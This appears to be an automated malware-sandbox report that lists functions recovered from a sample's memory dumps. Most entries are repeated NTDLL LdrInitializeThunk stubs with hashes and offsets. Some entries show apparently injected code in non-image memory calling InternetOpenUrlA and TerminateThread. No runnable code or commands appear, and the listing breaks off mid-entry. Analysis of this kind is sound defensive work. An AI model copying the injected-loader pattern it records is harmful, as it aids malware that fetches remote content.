LdrInitializeThunk.NTDLL ref: 1EB1FEAB

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FEDB

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FFBF

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FF34, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FF3F

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FC9B

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FC6B

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 1EB21D80, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB21D8E

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FD9A

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FDCB

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FAF3

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FADB

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FBC3

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1FB73

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 1EB21930, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB2193B

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 1EB1F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB1F90E

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 1EB200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB200CF

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 1EB20078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB20086

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 1EB20048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1EB20053

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 001B4FB8, Relevance: 3.1, APIs: 2, Instructions: 109networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(001B59EC,00000000,00000000,00000000,00000000), ref: 001B4FF4
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B513A

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: dd4e8aed08098deee57a6837837cd523f5ef6531911a398542b74c33f2a35252
Instruction ID: aee2f6d8e26dfe93082900b42188197339811b2b083dc982e5a9179fe71e8396
Opcode Fuzzy Hash: dd4e8aed08098deee57a6837837cd523f5ef6531911a398542b74c33f2a35252
Instruction Fuzzy Hash: 2F418E3024478AEFEB385F14CD51FFE36A6AF54780F208429FE0AAA190D7719944AB20

Uniqueness

Uniqueness Score: -1.00%

Function 001B4FBF, Relevance: 3.1, APIs: 2, Instructions: 100networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(001B59EC,00000000,00000000,00000000,00000000), ref: 001B4FF4
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B513A

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: ea613f97d3b6d83beae1215f441dcb2bc6ce249b7541800b20866fbe813c25cb
Instruction ID: ec5cdbbd0a8e989e4dc293bd98aa543f9eb5bdebae2f0a987399856404e6e7b5
Opcode Fuzzy Hash: ea613f97d3b6d83beae1215f441dcb2bc6ce249b7541800b20866fbe813c25cb
Instruction Fuzzy Hash: 5C31B030244B87EFEB346F58CD91BEE36A6AF147C0F244428ED4AD9584E771D945EB20

Uniqueness

Uniqueness Score: -1.00%

Function 001B45A5, Relevance: 1.9, APIs: 1, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40bb1c7a74847bedcac38b9ea3b428d4d9fd72974cd89b2c5e5e1f664aef63f
Instruction ID: 094c8000b4ccd4907ddb5d8e567372fc0d117f57f0b17be1912b1f580d298947
Opcode Fuzzy Hash: a40bb1c7a74847bedcac38b9ea3b428d4d9fd72974cd89b2c5e5e1f664aef63f
Instruction Fuzzy Hash: 48C177B0744305AFFB286F24CD46BF93662EF25350F618229FE869B1C2C3B899D59741

Uniqueness

Uniqueness Score: -1.00%

Function 001B6091, Relevance: 1.7, APIs: 1, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e8d2ea40b9f7cd9dc497a832f722b343cabad1a6fa9d2ef49853839f25c64a2
Instruction ID: e9479458fc358feea639547c3d216752af2fc2982e78271902176cdfce0ae574
Opcode Fuzzy Hash: 1e8d2ea40b9f7cd9dc497a832f722b343cabad1a6fa9d2ef49853839f25c64a2
Instruction Fuzzy Hash: 7051ED39048241DFDF289F74D9807EC7BA8EF37704F6505A9E8928F092D729D889C792

Uniqueness

Uniqueness Score: -1.00%

Function 001B3343, Relevance: 1.7, APIs: 1, Instructions: 181threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 001B346D

Memory Dump Source

Source File: 00000012.00000002.2232530438.00000000001B3000.00000040.00000001.sdmp, Offset: 001B3000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f23a2b8016fcc4a7bc7ccae8cd51ba67e9acf57d701327584bf0756a4f04441e
Instruction ID: 534500054bf154ab01b2073f661245f96df6ef31959cf66fbc1dd5c0c26d0fa2
